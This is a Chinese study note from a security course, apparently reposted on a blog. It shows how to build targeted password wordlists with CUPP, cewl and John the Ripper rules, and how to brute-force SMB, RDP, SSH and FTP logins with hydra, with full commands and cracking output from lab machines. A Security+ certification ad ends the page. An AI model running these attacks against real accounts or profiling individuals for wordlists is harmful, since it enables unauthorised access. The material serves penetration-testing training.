1. 程式人生 > >【安全牛學習筆記】字典、在線密碼破解-hydra

【安全牛學習筆記】字典、在線密碼破解-hydra

信息安全 密碼破解 security+

╋━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃字典 ┃

┃按個人信息生成其專屬的密碼字典 ┃

┃CUPP: Common User Password Profiler ┃

┃ - git clone https://github.com/Mebus/cupp.git ┃

┃ - python cup.py -i ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@K:~# git clone https://github.com/Mebus/cupp.git

root@K:~# ls

cupp Documents Music Public Templates

Desktop Downloads Pictures read Videos

root@K:~# rm read

root@K:~# cd cupp/

root@K:~/cupp# ls

cupp.cfg cupp.py docs README.md

root@K:~/cupp# python cupp.py -i //交互的問答生成密碼字典

[+] Insert the informations about the victim to make a dictionary

[+] If you don‘t know all the info ,just hit enter when asked! ;)

> First Name: aa

> Durnme: bb

> Nickname: cc

> Birthdate (DDMMYYYY): 20040216

> Parthers) name: dd

> Parthers) nickname: ee

> Parthers) birthdate (DDMMYYY): 20041900

> Child‘s name: ff

> Child‘s nickname: gg

> Child‘s birthdate (DDMMYYYY): 20042010

> Pet‘s name: tom

> Company name: alibaba

> Do you want to add some key words about the victim? Y/[N]:

> Do you wnat to add special chars at the end of word? Y/[N]: y

> Do you want to add some random numbers at the end of words? Y/[N]:

> Leet mode? (i.e. leet = 1337) Y/[N]: 123

[+] Now making a dictionary...

[+] Sorting list and removing duplicates...

[+] Saving dictionary to aa.txt, counting 48430 words.

[+] Now load your pistolero with aa.txt and shoot! Good luck!

root@K:~/cupp# ls

aa.txt cupp.cfg cupp.py docs README.md

root@K:~/cupp# more aa.txt

╋━━━━━━━━━━━━━━━━━━━━╋

┃字典 ┃

┃通過手機網站信息生成字典 ┃

┃cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt┃

┃ - -m:最小單詞長度 ┃

┃ - -d:爬網深度 ┃

┃ - -e:收集包含email地址信息 ┃

┃ - -c:每個單詞出現次數 ┃

┃ - 支持基本、摘要 身份認證 ┃

┃ - 支持代理 ┃

╋━━━━━━━━━━━━━━━━━━━━╋

root@K:~# cewl www.baidu.com -m 3 -d 3 -e -c -v -w a.txt

root@K:~# cat a.txt | more

╋━━━━━━━━━━━━━━━━╋

┃字典 ┃

┃用戶密碼變型 ┃

┃ - 基於cewl的結果進行密碼變型┃

┃ - 末尾增加數字串 ┃

┃ - 字母大小寫變化 ┃

┃ - 字母與字符互相轉換 ┃

┃ - 字母與數字互相轉換 ┃

┃ - P@$$w0rd ┃

╋━━━━━━━━━━━━━━━━╋


╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃字典 ┃

┃使用John the Ripper配置文件實現密碼動態變型 ┃

┃/etc/john/john.conf ┃

┃ - [List.Rules:Wordlist] ┃

┃ - $[0-9]$[0-9]$[0-9] ┃

┃ - john --wordlist=cewl.txt --rules --stdout > m.txt ┃

┃ ┃

┃ - [List.Rules:test] ┃

┃ $[0-9]$[0-9]$[0-9]$[a-zA-Z] ┃

┃ $[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[‘~@#$%^&*()-_=+] ┃

┃ - john --wordlist=cewl.txt --rules=test --stdout > m.txt ┃

┃ - john --wordlist=ahm.lst --rules=test HASHFILE ┃


root@K:~# gedit /etc/john/john.conf

root@K:~# ls

a.txt Documents Music Public Videos

Destop Downloads Pictures Templates

root@K:~# cat a.txt

root@K:~# cat a.txt | head -n 10

root@K:~# cat a.txt | head -n 10 | cut -d "," -f 1

root@K:~# cat a.txt | head -n 10 | cut -d "," -f 1 > p.lst

root@K:~# cat p.lst

root@K:~# john --wordlist=p.lst --rules --stdout > m.txt

root@K:~# cat m.txt | more

root@K:~# john --wordlist=p.lst --rules --stdout > m.txt

root@K:~# cat m.txt

root@K:~# wc -l m.txt

53564 m.txt

root@K:~# wc -l p.lst

10 p.lst

root@K:~# gedit /etc/john/john.conf

[List.Rules:test]

$[0-9]$[0-9]$[0-9]$[a-zA-Z]

$[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[‘~@#$%^&*()-_=+]

root@K:~# john --wordlist=p.lst --rules=test --stdout > m.txt

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃在線密碼破解-----hydra ┃

┃Hydra ┃

┃ - 九頭龍,砍去一個頭即長出新頭,後為大力神赫拉克勒斯所殺┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

root@K:~# hydra -h

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:

-R restore a previous aborted/crashed session

-S perform an SSL connect

-s PORT if the service is on a different default port, define it here

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE

-p PASS or -P FILE try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help

-e nsr try "n" null password, "s" login as pass and/or "r" reversed login

-u loop around users, not passwords (effective! implied with -x)

-C FILE colon separated "login:pass" format, instead of -L/-P options

-M FILE list of servers to attack, one entry per line, ‘:‘ to specify port

-o FILE write found login/password pairs to FILE instead of stdout

-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)

-t TASKS run TASKS number of connects in parallel (per host, default: 16)

-w / -W TIME waittime for responses (32s) / between connects per thread

-4 / -6 prefer IPv4 (default) or IPv6 addresses

-v / -V / -d verbose mode / show login+pass for each attempt / debug mode

-q do not print messages about connection erros

-U service module usage details

server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)

service the service to crack (see below for supported protocols)

OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL

v3.0. The newest version is always available at http://www.thc.org/thc-hydra

Don‘t use in military or secret service organizations, or for illegal purposes.

These services were not compiled in: sapr3 afp ncp oracle.


Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.

E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)

% export HYDRA_PROXY_HTTP=http://proxy:8080

% export HYDRA_PROXY_AUTH=user:pass

Examples:

hydra -l user -P passlist.txt ftp://192.168.0.1

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

hydra -l admin -p password ftp://[192.168.0.0/24]/

hydra -L logins.txt -P pws.txt -M targets.txt ssh

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

┃在線密碼破解-----hydra ┃

┃Windows密碼破解 ┃

┃ - hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd ┃

┃ - hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV ┃

┃Linux密碼破解 ┃

┃ - hydra -l root -P pass.lst ssh://1.1.1.1 -vV ┃

┃其他服務密碼破解 ┃

┃ - hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64 ┃

┃圖形化界面 ┃

┃ - xhydra ┃

╋━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╋

【課外拓展一】SMB(Server Message Block)是協議名,它能被用於Wap連接和客戶端與服務器之間的信息溝通。

【課外拓展二】遠程桌面協議(RDP, Remote Desktop Protocol)是一個多通道(multi-channel)的協議,讓用戶(客戶端或稱“本地電腦”)連上提供微軟終端機服務的電腦(服務器端或稱“遠程電腦”)。大部分的Windows都有客戶端所需軟件。其他操作系統也有這些客戶端軟件,例如Linux、FreeBSD、Mac OS X。服務端電腦方面,則聽取送到TCP3389端口的數據。

【課外拓展三】SSH 為 Secure Shell 的縮寫,由 IETF 的網絡工作小組(Network Working Group)所制定;SSH 為建立在應用層和傳輸層基礎上的安全協議。SSH 是目前較可靠,專為遠程登錄會話和其他網絡服務提供安全性的協議。利用 SSH 協議可以有效防止遠程管理過程中的信息泄露問題。SSH最初是UNIX系統上的一個程序,後來又迅速擴展到其他操作平臺。SSH在正確使用時可彌補網絡中的漏洞。SSH客戶端適用於多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平臺,都可運行SSH。

C:\Documents and Settings\Administrator>cd\

C:\>net user administrator *

請鍵入用戶的密碼: 1234

請在鍵入一次密碼以便確認: 1234

命令成功完成。

C:\>net share

共享名 資源 註釋

---------------------------------------------------------------------------

IPC$ 遠程IPC

ADMIN$ C:\WINDOWS 遠程管理

C$ C:\ 默認共享

命令成功完成。

root@K:~# nmap -p 192.168.1.118

Starting Nmap 7.12 (https://nmap.org) at 2016-04-20 21:50 CST

Nmap scan report for 192.168.1.118

Host is p (0.00043s latency).

Not shown: 65530 closed ports

PORT STATE SERVICE

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

3389/tcp open ms-wbt-server

MAC Address: 08-00:27:FA:A9:67 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 19.31 seconds

root@K:~# cp /usr/share/seclists/Passwords/john.txt .

root@K:~# grep 1234 john.txt

root@K:~# hydra -l administrator -P john.txt smb://192.168.1.118

Hydra v8.2 (c) 2014 by van Hauser/THC - Please do not use in military or secret

service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-04-20 21:53:.06

[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)

[DATA] max 1 task per 1 server, overall 64 tasks, 3107 login tries (l:1/p:3107),

~48 tries per task

[DATA] attacking service smb on port 445

[445][smb] host: 192.168.1.118 login: adminostrator password:1234

1 of 1 target successfully completed, 1 valid password found

Hydra (http://www.thc/org/thc-hydra) finished at 2015-04-20 21-53-07

root@K:~# tail john.txt

root@K:~# wc 1 john.txt

3017 john.txt

C:\>net user administrator *

請鍵入用戶的密碼: zhongguo

請在鍵入一次密碼以便確認: zhongguo

命令成功完成。

root@K:~# hydra -l administrator -P john.txt smb://192.168.1.118 -vV

root@K:~# hydra -l administrator -P john.txt rdp://192.168.1.118 -vV

root@K:~# hydra -l administrator -P john.txt rdp://192.168.1.118 -t 1 -vV //破解速度慢,正確率高

root@K:~# hydra -l root -P pass.lst ssh://192.168.1.113 -e nsr -vV //linux root賬號破解,空密碼

root@K:~# hydra -l root -P pass.lst ssh://192.168.1.113 -t 1 -e nsr -vV

root@K:~# nmap -p 192.168.1.113

Starting Nmap 7.12 (https://nmap.org) at 2016-04-20 21:50 CST

Nmap scan report for 192.168.1.113

Host is p (0.00043s latency).

Not shown: 65530 closed ports

PORT STATE SERVICE

2121/tcp open ccproxy-ftp

MAC Address: 08-00:27:B0:3A:76 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 19.31 seconds

root@K:~# nmap -p 192.168.1.113 -sV

Starting Nmap 7.12 (https://nmap.org) at 2016-04-20 21:50 CST

Nmap scan report for 192.168.1.113

Host is p (0.00043s latency).

Not shown: 65530 closed ports

該筆記為安全牛課堂學員筆記,想看此課程或者信息安全類幹貨可以移步到安全牛課堂


Security+認證為什麽是互聯網+時代最火爆的認證?

牛妹先給大家介紹一下Security+


Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在內的國際 IT 業 10 大熱門認證之一,和CISSP偏重信息安全管理相比,Security+ 認證更偏重信息安全技術和操作。

通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程序、數據和主機安全,訪問控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。

Security+認證如此火爆的原因?

原因一:在所有信息安全認證當中,偏重信息安全技術的認證是空白的, Security+認證正好可以彌補信息安全技術領域的空白 。

目前行業內受認可的信息安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重信息安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的信息安全工作經驗都要5年以上,CISP也要求大專學歷4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投標時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由於Security+偏重信息安全技術,所以對工作經驗沒有特別的要求。只要你有IT相關背景,追求進步就可以學習和考試。

原因二: IT運維人員工作與翻身的利器。

在銀行、證券、保險、信息通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程序猿們“生當做光棍,死亦寫代碼”的悲壯,但也有著“鋤禾日當午,不如運維苦“的感慨。天天對著電腦和機器,時間長了難免有對於職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝著網絡安全的方向發展,解決國內信息安全人才的匱乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。

原因三:接地氣、國際範兒、考試方便、費用適中!

CompTIA作為全球ICT領域最具影響力的全球領先機構,在信息安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。適合銀行、證券、保險、互聯網公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。

在目前的信息安全大潮之下,人才是信息安全發展的關鍵。而目前國內的信息安全人才是非常匱乏的,相信Security+認證一定會成為最火爆的信息安全認證。


本文出自 “11662938” 博客,請務必保留此出處http://11672938.blog.51cto.com/11662938/1984170

【安全牛學習筆記】字典、在線密碼破解-hydra